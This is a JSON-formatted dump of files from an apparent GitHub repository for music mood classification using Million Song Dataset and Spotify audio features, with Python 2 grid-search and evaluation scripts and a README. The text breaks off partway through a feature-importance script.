\"---------------------------------------------------------------------------------------------------\"\nrfc.fit(train[audio_features], train['Mood'])\nprint \"Random Forest Classifier\"\nprint accuracy_score(test['Mood'], rfc.predict(test[audio_features]))\n\nxgboost.fit(train[audio_features], train['Mood'])\nprint \"XGBoost Classifier\"\nprint accuracy_score(test['Mood'], xgboost.predict(test[audio_features]))\n\ngb.fit(train[audio_features], train['Mood'])\nprint \"Gradient Boosting Classifier\"\nprint accuracy_score(test['Mood'], gb.predict(test[audio_features]))\n\nxtra.fit(train[audio_features], train['Mood'])\nprint \"Extra Trees Classifier\"\nprint accuracy_score(test['Mood'], xtra.predict(test[audio_features]))\n\nada.fit(train[audio_features], train['Mood'])\nprint \"Ada Boost Classifier\"\nprint accuracy_score(test['Mood'], ada.predict(test[audio_features]))\n\n\nknn.fit(train[audio_features], train['Mood'])\nprint \"KNeighbors Classifier\"\nprint accuracy_score(test['Mood'], knn.predict(test[audio_features]))\n\nsvm.fit(train[audio_features], train['Mood'])\nprint \"Support Vector Machines\"\nprint accuracy_score(test['Mood'], svm.predict(test[audio_features]))\n\nnb.fit(train[audio_features], train['Mood'])\nprint \"Naive Bayes Classifier\"\nprint accuracy_score(test['Mood'], nb.predict(test[audio_features]))\n\nensemble.fit(train[audio_features], train['Mood'])\nprint \"Voting Classifier\"\nprint accuracy_score(test['Mood'], ensemble.predict(test[audio_features]))\n\n\nprint \"Evaluating on descriptive features \"\nprint \"---------------------------------------------------------------------------------------------------\"\nrfc.fit(train[qual_features], train['Mood'])\nprint \"Random Forest Classifier\"\nprint accuracy_score(test['Mood'], rfc.predict(test[qual_features]))\n\n\nxgboost.fit(train[qual_features], train['Mood'])\nprint \"XGBoost Classifier\"\nprint accuracy_score(test['Mood'], 
xgboost.predict(test[qual_features]))\n\n\ngb.fit(train[qual_features], train['Mood'])\nprint \"Gradient Boosting Classifier\"\nprint accuracy_score(test['Mood'], gb.predict(test[qual_features]))\n\nxtra.fit(train[qual_features], train['Mood'])\nprint \"Extra Trees Classifier\"\nprint accuracy_score(test['Mood'], xtra.predict(test[qual_features]))\n\nada.fit(train[qual_features], train['Mood'])\nprint \"Ada Boost Classifier\"\nprint accuracy_score(test['Mood'], ada.predict(test[qual_features]))\n\nknn.fit(train[qual_features], train['Mood'])\nprint \"KNeighbors Classifier\"\nprint accuracy_score(test['Mood'], knn.predict(test[qual_features]))\n\nsvm.fit(train[qual_features], train['Mood'])\nprint \"Support Vector Machines\"\nprint accuracy_score(test['Mood'], svm.predict(test[qual_features]))\n\nnb.fit(train[qual_features], train['Mood'])\nprint \"Naive Bayes Classifier\"\nprint accuracy_score(test['Mood'], nb.predict(test[qual_features]))\n\nensemble.fit(train[qual_features], train['Mood'])\nprint \"Voting Classifier\"\nprint accuracy_score(test['Mood'], ensemble.predict(test[qual_features]))\n\nsubprocess.call(['speech-dispatcher']) #start speech dispatcher\nsubprocess.call(['spd-say', '\"your process has finished\"'])\n" }, { "alpha_fraction": 0.692307710647583, "alphanum_fraction": 0.7139860391616821, "avg_line_length": 35.66666793823242, "blob_id": "f8444784dc1455e16d11ecb51f6a0bf0d501f0a8", "content_id": "a5daa6c45bcea49e0fb138a630633965ad2d3b21", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1430, "license_type": "no_license", "max_line_length": 133, "num_lines": 39, "path": "/src/gridsearch_gb.py", "repo_name": "ashish3805/JoyDivision", "src_encoding": "UTF-8", "text": "from get_train_test import train\nfrom sklearn.metrics import accuracy_score, make_scorer\nfrom time import time\nimport subprocess\nfrom sklearn.ensemble import GradientBoostingClassifier\nfrom sklearn.model_selection import GridSearchCV, KFold, cross_val_score\n\nqual_features = ['Danceability', 'Speechiness', 'Instrumentalness', 'Beats',\n 'Energy', 'Acousticness', 'LoudnessSq']\n\n\npitches = [col for col in list(train.columns.values) if col.startswith('pitch_')]\ntimbres = [col for col in list(train.columns.values) if col.startswith('timavg_')]\n\naudio_features = pitches + timbres\n\nfeatures = audio_features + qual_features\n\ngb_params = {\"loss\": ['deviance', 'exponential'], 'learning_rate': [0.1, 0.001, 0.001, 1], 'n_estimators': [100, 150, 200, 350, 500],\n 'max_depth': [3, 6, 10], 'criterion': ['mse']}\n\nstart = time()\n\naccuracy = make_scorer(accuracy_score)\n\ngb_grid = GridSearchCV(estimator=GradientBoostingClassifier(), param_grid=gb_params, scoring=accuracy, cv=5)\ngb_grid.fit(train[features], train['Mood'])\n\nprint \"Gradient Boost grid search: \"\nprint \"CV results\", gb_grid.cv_results_\nprint \"Best GB\", gb_grid.best_estimator_\nprint \"Best CV score for GB\", gb_grid.best_score_\nprint \"Best GB params:\", gb_grid.best_params_\n\n\nprint \"Finished in: \", (time() - start)\n\nsubprocess.call(['speech-dispatcher']) #start speech dispatcher\nsubprocess.call(['spd-say', '\"your process has finished\"'])\n" }, { "alpha_fraction": 0.6652451753616333, "alphanum_fraction": 0.697938859462738, "avg_line_length": 33.26829147338867, "blob_id": "3ce4323e31b3d413462a827cb0015b0074e3876e", "content_id": "5ffddb57a3af053b03ae496ed80d74557ea3e50d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", 
"length_bytes": 1407, "license_type": "no_license", "max_line_length": 123, "num_lines": 41, "path": "/src/gridsearch_xgb.py", "repo_name": "ashish3805/JoyDivision", "src_encoding": "UTF-8", "text": "from xgboost import XGBClassifier\nfrom sklearn.model_selection import GridSearchCV\nfrom get_train_test import train\nfrom sklearn.metrics import accuracy_score, make_scorer\nfrom time import time\nimport subprocess\n\n\nqual_features = ['Danceability', 'Speechiness', 'Instrumentalness', 'Beats',\n 'Energy', 'Acousticness', 'LoudnessSq']\n\n\npitches = [col for col in list(train.columns.values) if col.startswith('pitch_')]\ntimbres = [col for col in list(train.columns.values) if col.startswith('timavg_')]\n\naudio_features = pitches + timbres\n\nfeatures = audio_features + qual_features\n\nstart = time()\n\naccuracy = make_scorer(accuracy_score)\n\n\nparam_grid = {\"max_depth\": [3, 5, 10, 15, 17], \"learning_rate\": [0.1, 0.001, 1], \"n_estimators\": [100, 150, 200, 300, 500],\n \"gamma\": [0, 0.5, 0.1, 0.01], \"colsample_bytree\": [1], \"max_delta_step\": [0, 0.01, 0.1]}\n\n\nxgb_grid = GridSearchCV(estimator=XGBClassifier(), param_grid=param_grid, scoring=accuracy, cv=5)\nxgb_grid.fit(train[features], train['Mood'])\n\nprint \"SVM grid search: \"\nprint \"CV results\", xgb_grid.cv_results_\nprint \"Best SVM\", xgb_grid.best_estimator_\nprint \"Best CV score for SVM\", xgb_grid.best_score_\nprint \"Best SVM params:\", xgb_grid.best_params_\n\nprint \"Finished in: \", (time() - start)\n\nsubprocess.call(['speech-dispatcher']) #start speech dispatcher\nsubprocess.call(['spd-say', '\"your process has finished\"'])\n\n\n" }, { "alpha_fraction": 0.4955752193927765, "alphanum_fraction": 0.7079645991325378, "avg_line_length": 15.285714149475098, "blob_id": "27b8f122ba89bde19567c15225907b724da6565e", "content_id": "2ef44f58ebe7d4a93c41b7669194bc52fbb75c21", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Text", "length_bytes": 113, "license_type": "no_license", "max_line_length": 20, "num_lines": 7, "path": "/requirements.txt", "repo_name": "ashish3805/JoyDivision", "src_encoding": "UTF-8", "text": "pandas==0.18.1\nscikit-learn==0.17.1\nnumpy==1.11.0\nvirtualenv==1.11.4\nmatplotlib=1.5.3\nseaborn==0.7.1\nxgboost==0.6" }, { "alpha_fraction": 0.7167019248008728, "alphanum_fraction": 0.7237491011619568, "avg_line_length": 32, "blob_id": "6429e215164a16246d00e969d43ab310af57d7e9", "content_id": "28b52f63b450f049797de73917c2579fb7c9a7ce", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1419, "license_type": "no_license", "max_line_length": 87, "num_lines": 43, "path": "/src/gridsearch_svm.py", "repo_name": "ashish3805/JoyDivision", "src_encoding": "UTF-8", "text": "from sklearn.preprocessing import StandardScaler\nfrom sklearn.svm import SVC\nfrom sklearn.model_selection import GridSearchCV\nfrom get_train_test import train\nfrom sklearn.metrics import accuracy_score, make_scorer\nfrom time import time\nimport subprocess\n\nqual_features = ['Danceability', 'Speechiness', 'Instrumentalness', 'Beats',\n 'Energy', 'Acousticness', 'LoudnessSq']\n\n\npitches = [col for col in list(train.columns.values) if col.startswith('pitch_')]\ntimbres = [col for col in list(train.columns.values) if col.startswith('timavg_')]\n\naudio_features = pitches + timbres\n\nfeatures = audio_features + qual_features\n\nstart = time()\n\naccuracy = make_scorer(accuracy_score)\n\n# Scaling all numeric features for SVMs\nscaler = 
StandardScaler()\ntrain[features] = scaler.fit_transform(train[features])\n\n\nsvc_params = {\"C\": [1, 2, 3], \"gamma\": [0.1, 1, 2, 3, 4], \"kernel\": ['linear', 'rbf']}\n\nsvm_grid = GridSearchCV(estimator=SVC(), param_grid=svc_params, scoring=accuracy, cv=2)\nsvm_grid.fit(train[features], train['Mood'])\n\nprint \"SVM grid search: \"\nprint \"CV results\", svm_grid.cv_results_\nprint \"Best SVM\", svm_grid.best_estimator_\nprint \"Best CV score for SVM\", svm_grid.best_score_\nprint \"Best SVM params:\", svm_grid.best_params_\n\nprint \"Finished in: \", (time() - start)\n\nsubprocess.call(['speech-dispatcher']) #start speech dispatcher\nsubprocess.call(['spd-say', '\"your process has finished\"'])\n" }, { "alpha_fraction": 0.7587209343910217, "alphanum_fraction": 0.7700581550598145, "avg_line_length": 57.28813552856445, "blob_id": "9bb643dc4901e59e363de5e3a9501ab68dccde5e", "content_id": "7f2747f9f422f3f3c7958d56625dd67b91090441", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 3440, "license_type": "no_license", "max_line_length": 172, "num_lines": 59, "path": "/README.md", "repo_name": "ashish3805/JoyDivision", "src_encoding": "UTF-8", "text": "## Music Mood Classification Using the Million Song Dataset\n\n\n### Technical Summary \n\nIf you want to see a quick summary of the methods & results, here are the [slides](http://bit.do/joydiv). \n\nA detailed technical report is available as a [PDF](https://github.com/bhavika/JoyDivision/blob/master/report/report.pdf)\n\n\n### Installation\n\n1. Clone/download ZIP from https://github.com/bhavika/JoyDivision.git\n2. cd JoyDivision\n3. If you want to create a virtual environment, run virtualenv <the name of the environment, say 'tekwani'>\n4. To begin using the virtual environment, you must activate it.\n   $ source tekwani/bin/activate\n5. Now install the packages specified in requirements.txt. You can do this using\n   pip freeze > requirements.txt (freeze the current state of the environment)\n   pip install -r requirements.txt\n\n\n### Running the solution\n\n1. Download the data from the Google Drive link here: http://bit.do/datasets\n   The total download size should be about 2.8 GB. \n2. Move the downloaded files to tekwani/data and check that it contains the following files:\n\n   -fullset.pkl\n   -train.pkl\n   -test.pkl\n\nThe folder JoyDivision/explore contains plots, output for different estimators' grid search results, scripts to handle h5 files and a list of getter methods \nfor h5 files (hdf5_getters.txt)\n\nThe file `evaluation.py` is the final file that generates results as shown in the report. \nIt will run 6 models for 3 feature combinations - audio and descriptive, descriptive only, audio only.\n\n\n### Other files\n\n1. `create_dataset.py` builds the dataset and randomly splits it into a 60-40 distribution for train and test sets.\n2. `models.py` evaluates feature importance for ensemble estimators and performs cross validation for all estimators.\n3. `read_h5.py` is used to pull data out of HDF5 files. To run this, you need to download the Million Song Subset and place it in `data`\n4. `spotify.py` searches for Track IDs for the songs we have labeled in Spotify's database.\n5. `spotify_audio_features.py` fetches Danceability, Energy, Speechiness, Acousticness, Valence and Instrumentalness for all the track IDs we were able to get from \n   `spotify.py`. \n6. `rfe.py` gets the ranking of features. 
I use the number of optimal features (n) obtained here to select the top n features in `feature_importance.py` for the estimators.\n7. `feature_combinations.py` evaluates the importance of features when compared to the groups they're combined with. For example, descriptive features paired with timbre, \n   audio features paired with descriptive, etc.\n8. `get_train_test.py` serves the train and test sets (*.pkl) to any file that imports it.\n9. `scratch\\labels.csv` contains the full list of songs and the labels I assigned to them. \n10. `scratch\\models.out` contains the output for `models.py`. These are only cross validation results. \n11. `learning_curve.py` plots the training score and cross validation score for an SVM with a linear kernel.\n12. `*.out` files - output files. \n13. `hdf5_getters.py` is an interface provided along with the Million Song Dataset by LabROSA (Columbia University). It is used to read HDF5 files which is the initial\n    form of the Million Song Dataset.\n14. All files named `gridsearch_.py` are used to do a hyperparameter search for the models used. These models are AdaBoostClassifier, ExtraTreesClassifier, \n    GradientBoostingClassifier, SVM, KNearestNeighbour and RandomForestClassifier.\n\n" }, { "alpha_fraction": 0.6344314813613892, "alphanum_fraction": 0.6439957618713379, "avg_line_length": 29.852458953857422, "blob_id": "f88d83cf12f754470f2320b567d448f9df2bf5a9", "content_id": "1af7867b7de16ca3a87cd23b8ea40ff0e1777c9a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1882, "license_type": "no_license", "max_line_length": 177, "num_lines": 61, "path": "/src/read_h5.py", "repo_name": "ashish3805/JoyDivision", "src_encoding": "UTF-8", "text": "import pandas as pd\nimport numpy as np\nimport os\nimport hdf5_getters as getter\nimport glob\nimport csv\nfrom time import time\n\ntracks = []\n\nstart = time()\n\nread_file = pd.read_csv('../data/files.csv')\n\ntracks = read_file['Track'].tolist()\n\n\ndef recursive_glob(treeroot, pattern):\n    results = []\n    for base, dirs, files in os.walk(treeroot):\n        for f in files:\n            if os.path.basename(f) in tracks:\n                results.append(base+'/'+f);\n    return results\n\nresults = recursive_glob('../data/MillionSongSubset/data/', '*.h5')\n\n\ndef get_song_data(results):\n    songs_data = []\n    for f in results:\n        h5 = getter.open_h5_file_read(f)\n        songs_data.append(\n            [os.path.basename(f), getter.get_artist_name(h5), getter.get_title(h5),\n             getter.get_time_signature(h5), getter.get_key(h5),\n             getter.get_segments_loudness_max(h5), getter.get_mode(h5),\n             getter.get_beats_confidence(h5), getter.get_duration(h5),\n             getter.get_tempo(h5), getter.get_loudness(h5),\n             getter.get_segments_timbre(h5), getter.get_segments_pitches(h5),\n             getter.get_key_confidence(h5)])\n        h5.close()\n    return songs_data\n\nfinal = get_song_data(results)\n\nheaders = ['File', 'Artist', 'Title', 'TimeSignature', 'Key', 'SegmentsLoudMax', 'Mode', 'BeatsConfidence', 'Length', 'Tempo', 'Loudness', 'Timbre', 'Pitches', 'KeyConfidence']\n\nprint (\"Elapsed time:\", time() - start)\n\nsongs_df = pd.DataFrame(final, columns=headers)\n\nsongs_df.to_pickle('../data/songs.pkl')\n\nsubset = songs_df[songs_df['File'].isin(tracks)]\nsubset_dedup = subset.drop_duplicates(subset=['File', 'Artist', 'Title'], keep='first')\nsubset_dedup.to_pickle('../data/subset.pkl')\n\n\n# import subprocess\n# subprocess.call(['speech-dispatcher']) #start speech dispatcher\n# subprocess.call(['spd-say', '\"your process has finished\"'])\n" }, { 
"alpha_fraction": 0.6176065802574158, "alphanum_fraction": 0.6400733590126038, "avg_line_length": 37.28070068359375, "blob_id": "7530878f44637f95cd3bedbc8c9c38f77f16615d", "content_id": "380acbf5d1d38611e6c012641dcca4daa17f9cc8", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2181, "license_type": "no_license", "max_line_length": 136, "num_lines": 57, "path": "/src/learning_curve.py", "repo_name": "ashish3805/JoyDivision", "src_encoding": "UTF-8", "text": "import matplotlib.pyplot as plt\nimport numpy as np\nfrom sklearn.svm import SVC\nfrom sklearn.model_selection import learning_curve\nfrom sklearn.model_selection import ShuffleSplit\nfrom get_train_test import train\n\n\nqual_features = ['Danceability', 'Speechiness', 'Instrumentalness', 'Mode', 'Tempo', 'TimeSignature', 'KeyMode', 'TempoMode', 'Beats',\n 'Energy', 'Acousticness', 'LoudnessSq']\n\n\naudio_features = ['timavg_5', 'timavg_3', 'pitch_1', 'timavg_1', 'pitch_0', 'pitch_8', 'pitch_5', 'timavg_0',\n 'pitch_10', 'pitch_6', 'pitch_2', 'timavg_4', 'pitch_11', 'pitch_3', 'pitch_7', 'timavg_7',\n 'timavg_9', 'pitch_9', 'pitch_4', 'timavg_10', 'timavg_2', 'timavg_6', 'timavg_8', 'timavg_11']\n\n\nfeatures = audio_features + qual_features\n\n\ndef plot_learning_curve(estimator, title, X, y, ylim=None, cv=None,\n n_jobs=1):\n plt.figure()\n plt.title(title)\n\n if ylim is not None:\n plt.ylim(*ylim)\n plt.xlabel(\"Training examples\")\n plt.ylabel(\"Score\")\n\n train_sizes, train_scores, test_scores = learning_curve(estimator=estimator, X=X, y=y, cv=cv, n_jobs=n_jobs)\n\n train_scores_mean = np.mean(train_scores, axis=1)\n train_scores_std = np.std(train_scores, axis=1)\n test_scores_mean = np.mean(test_scores, axis=1)\n test_scores_std = np.std(test_scores, axis=1)\n plt.grid()\n plt.fill_between(train_sizes, train_scores_mean - train_scores_std,\n train_scores_mean+train_scores_std, alpha=0.1, color='r')\n plt.fill_between(train_sizes, test_scores_mean - test_scores_std,\n test_scores_mean + test_scores_std, alpha=0.1, color='r')\n plt.plot(train_sizes, train_scores_mean, 'o-', color='r', label=\"Training score\")\n plt.plot(train_sizes, test_scores_mean, 'o-', color='b', label=\"Cross validation score\")\n plt.legend(loc='best')\n\n return plt\n\n\nX, y = train[features], train['Mood']\n\ncv = ShuffleSplit(n_splits=15, test_size=0.4, random_state=0)\ntitle = \"Learning Curves (SVM, RBF kernel, $\\gamma=3$)\"\nestimator = SVC(kernel='linear', gamma=3)\n\nplot_learning_curve(estimator, title, X, y, (0, 1.01), cv, n_jobs=4)\n\nplt.show()" }, { "alpha_fraction": 0.6215686202049255, "alphanum_fraction": 0.6313725709915161, "avg_line_length": 41.5, "blob_id": "e635128a82e597d3fc7cc3b17ec1bc6aa97e7314", "content_id": "7a45c91d2e5e3c0b7bb794a70f4da49b1f092292", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1530, "license_type": "no_license", "max_line_length": 189, "num_lines": 36, "path": "/src/spotify_audio_features.py", "repo_name": "ashish3805/JoyDivision", "src_encoding": "UTF-8", "text": "from spotipy.oauth2 import SpotifyClientCredentials\nimport spotipy\nfrom time import time\nimport pandas as pd\n\nclient_credentials_manager = SpotifyClientCredentials(client_id=YOUR_CLIENT_ID, client_secret=YOUR_CLIENT_SECRET)\nsp = spotipy.Spotify(client_credentials_manager=client_credentials_manager)\nsp.trace=True\n\nalltracks = pd.read_csv('../data/trackids_new_2.csv', sep=';', header=0)\ntracklist = 
alltracks[alltracks['TrackID'] != 'Not Found']\ntracklist = tracklist['TrackID'].tolist()\nprint len(tracklist)\nchunks = [tracklist[x:x+49] for x in xrange(0, len(tracklist), 49)]\n\n\nstart = time()\n\nwith open('../data/audiofeatures3.csv', 'w') as out:\n for idx, chunk in enumerate(chunks):\n print \"Chunk {} has length {}\".format(idx, len(chunk))\n features = sp.audio_features(chunk)\n for i in range(len(features)):\n try:\n energy = features[i]['energy']\n speechiness = features[i]['speechiness']\n valence = features[i]['valence']\n danceability = features[i]['danceability']\n acousticness = features[i]['acousticness']\n instrumentalness = features[i]['instrumentalness']\n out.write(chunk[i] + \";\" + str(energy) +\";\" + str(speechiness) + \";\" + str(valence) + \";\" + str(danceability) + \";\" + str(acousticness) + \";\" + str(instrumentalness) + \"\\n\")\n except TypeError:\n out.write(chunk[i] + \";0;0;0;0;0;0 \\n\")\nout.close()\n\nprint \"Elapsed time in seconds: \", time() - start\n" }, { "alpha_fraction": 0.69554203748703, "alphanum_fraction": 0.7071934938430786, "avg_line_length": 33.017242431640625, "blob_id": "142ef99026a4cc1c4f65e09f3353544163f5aebe", "content_id": "503a5654b2e5963a51ffcb2320bbed29d3f6fab0", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1974, "license_type": "no_license", "max_line_length": 125, "num_lines": 58, "path": "/src/rfe.py", "repo_name": "ashish3805/JoyDivision", "src_encoding": "UTF-8", "text": "print(__doc__)\n\nimport matplotlib.pyplot as plt\nfrom sklearn.ensemble import RandomForestClassifier\nfrom sklearn.model_selection import KFold\nfrom sklearn.feature_selection import RFECV\nfrom get_train_test import train\nfrom time import time\n\n\ntimbre_avg = [col for col in list(train.columns.values) if col.startswith('timavg_')]\ntimbre = [col for col in list(train.columns.values) if col.startswith('tim_')]\npitch_col = [col for col in list(train.columns.values) if col.startswith('pitch_')]\ndesc_features = ['Energy', 'Tempo', 'LoudnessSq', 'Acousticness', 'Instrumentalness', 'Speechiness', 'Danceability', 'Beats']\nnotational_features = ['Mode', 'KeyMode', 'TimeSignature', 'TempoMode', 'Beats']\ntop_4_timbre = ['timavg_1', 'timavg_2', 'timavg_3', 'timavg_4']\n\nfeatures = timbre_avg + pitch_col + desc_features + notational_features\n\nstart = time()\n\n# Create the RFE object and compute a cross-validated score.\nrfc = RandomForestClassifier(bootstrap=True, class_weight=None, criterion='gini',\n max_depth=15, max_features='auto', max_leaf_nodes=None,\n min_impurity_split=1e-07, min_samples_leaf=1,\n min_samples_split=2, min_weight_fraction_leaf=0.0,\n n_estimators=500, n_jobs=1, oob_score=False, random_state=None,\n verbose=0, warm_start=False)\n\nX = train[features]\ny = train['Mood']\n\n\nrfecv = RFECV(estimator=rfc, step=1, cv=KFold(5),\n scoring='accuracy')\n\nrfecv.fit(X, y)\n\nprint(\"Optimal number of features : %d\" % rfecv.n_features_)\n\n\nprint (\"Ranking of features\")\nranked = [rfecv.ranking_[i] for i in range(len(rfecv.ranking_))]\nprint ranked\n\n# Plot number of features VS. 
cross-validation scores\nplt.figure()\nplt.xlabel(\"Number of features selected\")\nplt.ylabel(\"Cross validation score (nb of correct classifications)\")\nplt.plot(range(1, len(rfecv.grid_scores_) + 1), rfecv.grid_scores_)\nplt.show()\n\n\nprint \"Support\", rfecv.support_\nprint rfecv.grid_scores_\n\n\nprint \"Elapsed time: \", time()-start\n\n" }, { "alpha_fraction": 0.7151079177856445, "alphanum_fraction": 0.729496419429779, "avg_line_length": 34.64102554321289, "blob_id": "6c102583df3e19d6d67a843f553849854ba6bc0c", "content_id": "feba9f8a1d6cb976fa3275d5524e18fe9ca8bef5", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1390, "license_type": "no_license", "max_line_length": 126, "num_lines": 39, "path": "/src/gridsearch_extratrees.py", "repo_name": "ashish3805/JoyDivision", "src_encoding": "UTF-8", "text": "from get_train_test import train\nfrom sklearn.metrics import accuracy_score, make_scorer\nfrom time import time\nimport subprocess\nfrom sklearn.ensemble import ExtraTreesClassifier\nfrom sklearn.model_selection import GridSearchCV, KFold, cross_val_score\n\nqual_features = ['Danceability', 'Speechiness', 'Instrumentalness', 'Beats',\n 'Energy', 'Acousticness', 'LoudnessSq']\n\n\npitches = [col for col in list(train.columns.values) if col.startswith('pitch_')]\ntimbres = [col for col in list(train.columns.values) if col.startswith('timavg_')]\n\naudio_features = pitches + timbres\n\nfeatures = audio_features + qual_features\n\n\nxtra_params = {\"n_estimators\":[10, 50, 100, 500, 700], \"max_depth\":[7, 10, 15], \"max_features\":['auto', 'sqrt', 'log2', None]}\n\nstart = time()\naccuracy = make_scorer(accuracy_score)\n\nxtra_grid = GridSearchCV(estimator=ExtraTreesClassifier(), param_grid=xtra_params, scoring=accuracy, cv=5)\nxtra_grid.fit(train[features], train['Mood'])\n\n\nprint \"Extra Trees grid search: \"\nprint \"CV results\", xtra_grid.cv_results_\nprint \"Best Extra Trees\", xtra_grid.best_estimator_\nprint \"Best CV score for Extra Trees\", xtra_grid.best_score_\nprint \"Best Extra Trees params:\", xtra_grid.best_params_\n\n\nprint \"Finished in: \", (time() - start)\n\nsubprocess.call(['speech-dispatcher']) #start speech dispatcher\nsubprocess.call(['spd-say', '\"your process has finished\"'])\n" }, { "alpha_fraction": 0.7265372276306152, "alphanum_fraction": 0.7281553149223328, "avg_line_length": 24.72916603088379, "blob_id": "5dbfda101dee353cfced64f44cecd3107a8d0615", "content_id": "93aa85a163c6e5b146a38c0b5688685075067983", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1236, "license_type": "no_license", "max_line_length": 82, "num_lines": 48, "path": "/src/svm.py", "repo_name": "ashish3805/JoyDivision", "src_encoding": "UTF-8", "text": "from get_train_test import train, test\nfrom sklearn.svm import SVC\nimport numpy as np\nfrom sklearn.metrics import accuracy_score, confusion_matrix\nfrom time import time\nimport seaborn as sns\nimport matplotlib.pyplot as plt\nfrom sklearn.preprocessing import StandardScaler as scaler\n\nqual_features = ['Danceability', 'Speechiness', 'Instrumentalness', 'Beats',\n 'Energy', 'Acousticness', 'LoudnessSq']\n\n\npitches = [col for col in list(train.columns.values) if col.startswith('pitch_')]\ntimbres = [col for col in list(train.columns.values) if col.startswith('timavg_')]\n\naudio_features = pitches + timbres\n\nfeatures = audio_features + qual_features\n\nX = train[features]\ny = train['Mood']\n\nX_test = 
test[features]\ny_test = test['Mood']\n\n\n# Scaling all numeric features for SVMs\ntrain[features] = scaler().fit_transform(train[features])\ntest[features] = scaler().fit_transform(test[features])\n\n\nstart = time()\n\nclf = SVC(kernel='linear', C=3, gamma=3)\n# clf.fit(X_train, y_train)\nclf.fit(X,y)\ny_pred = clf.predict(X_test)\n\ncfm = confusion_matrix(y_test, y_pred)\nprint cfm\nsns.heatmap(cfm, annot=True, fmt='d', cmap=\"YlGnBu\")\n# plt.show()\n\nprint accuracy_score(y_test, y_pred)\nprint \"Time elapsed\", time() - start\n\nprint features\n\n" }, { "alpha_fraction": 0.6379605531692505, "alphanum_fraction": 0.6412478089332581, "avg_line_length": 21.153846740722656, "blob_id": "3bdd3e79bec1e8c8e2ca016f2379f40a68c73c95", "content_id": "8da9f5e0002c4aa415f2120ac4fef86b1bed9476", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 577, "license_type": "no_license", "max_line_length": 50, "num_lines": 26, "path": "/src/train_test_split.py", "repo_name": "ashish3805/JoyDivision", "src_encoding": "UTF-8", "text": "import pandas as pd\nimport numpy as np\n\n\ndata = pd.read_pickle('../data/fullset.pkl')\n\n# Partition dataset to get a train and test set\n# track_info = data[['File', 'Artist', 'Title']]\n# track_info.to_csv('../data/tracks.csv', sep=';')\n\nmask = np.random.rand(len(data)) < 0.6\n\ntrain = data[mask]\ntest = data[~mask]\n\nprint \"Train--------\"\nhappy_train = train['Mood'] == 'happy'\nprint happy_train.value_counts()\n\nprint \"Test----------\"\nhappy_test = test['Mood'] == 'happy'\nprint happy_test.value_counts()\n\n\ntrain.to_pickle('../data/train.pkl')\ntest.to_pickle('../data/test.pkl')\n\n" }, { "alpha_fraction": 0.703484058380127, "alphanum_fraction": 0.7220163345336914, "avg_line_length": 34.5, "blob_id": "7f93bdc56181bda65eaf834c3b6003524c08db26", "content_id": "c17aca0fe59094ffc02516a45ff46382263f34d6", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1349, "license_type": "no_license", "max_line_length": 128, "num_lines": 38, "path": "/src/gridsearch_ada.py", "repo_name": "ashish3805/JoyDivision", "src_encoding": "UTF-8", "text": "from get_train_test import train\nfrom sklearn.metrics import accuracy_score, make_scorer\nfrom time import time\nimport subprocess\nfrom sklearn.ensemble import AdaBoostClassifier\nfrom sklearn.model_selection import GridSearchCV, KFold, cross_val_score\n\nqual_features = ['Danceability', 'Speechiness', 'Instrumentalness', 'Beats',\n                 'Energy', 'Acousticness', 'LoudnessSq']\n\n\npitches = [col for col in list(train.columns.values) if col.startswith('pitch_')]\ntimbres = [col for col in list(train.columns.values) if col.startswith('timavg_')]\n\naudio_features = pitches + timbres\n\nfeatures = audio_features + qual_features\n\nstart = time()\n\naccuracy = make_scorer(accuracy_score)\n\nab_params = {\"n_estimators\": [50, 100, 150, 300, 500], \"learning_rate\": [0.1, 0.01, 0.001, 1], \"algorithm\":['SAMME', 'SAMME.R']}\n\nab_grid = GridSearchCV(estimator=AdaBoostClassifier(), param_grid=ab_params, scoring=accuracy, cv = 5)\nab_grid.fit(train[features], train['Mood'])\n\nprint \"Ada Boost grid search: \"\nprint \"CV results\", ab_grid.cv_results_\nprint \"Best Ada\", ab_grid.best_estimator_\nprint \"Best CV score for Ada\", ab_grid.best_score_\nprint \"Best Ada params:\", ab_grid.best_params_\n\n\nprint \"Finished in: \", (time() - start)\n\nsubprocess.call(['speech-dispatcher']) #start speech 
dispatcher\nsubprocess.call(['spd-say', '\"your process has finished\"'])\n" }, { "alpha_fraction": 0.7034246325492859, "alphanum_fraction": 0.7143835425376892, "avg_line_length": 36.35897445678711, "blob_id": "5a0bcfb4bcf1386a65d5b2fac0f379ea0a271329", "content_id": "27d3b446dfbe78fa602b89aa42105677a9dba7ad", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1460, "license_type": "no_license", "max_line_length": 116, "num_lines": 39, "path": "/src/feature_importance.py", "repo_name": "ashish3805/JoyDivision", "src_encoding": "UTF-8", "text": "import numpy as np\nimport matplotlib.pyplot as plt\nfrom sklearn.ensemble import ExtraTreesClassifier\nfrom get_train_test import train\n\ntimbre_avg = [col for col in list(train.columns.values) if col.startswith('timavg_')]\ntimbre = [col for col in list(train.columns.values) if col.startswith('tim_')]\npitch_col = [col for col in list(train.columns.values) if col.startswith('pitch_')]\ndesc_features = ['Energy', 'Tempo', 'LoudnessSq', 'Acousticness', 'Instrumentalness', 'Speechiness', 'Danceability']\nnotational_features = ['Mode', 'KeyMode', 'TimeSignature', 'TempoMode', 'Beats']\ntop_4_timbre = ['timavg_1', 'timavg_2', 'timavg_3', 'timavg_4']\n\nfeatures = timbre_avg + pitch_col + desc_features + notational_features\n\nX = train[features]\ny = train['Mood']\n\n\nforest = ExtraTreesClassifier(n_estimators=250)\nforest.fit(X,y)\n\nimportances = forest.feature_importances_\nstd = np.std([tree.feature_importances_ for tree in 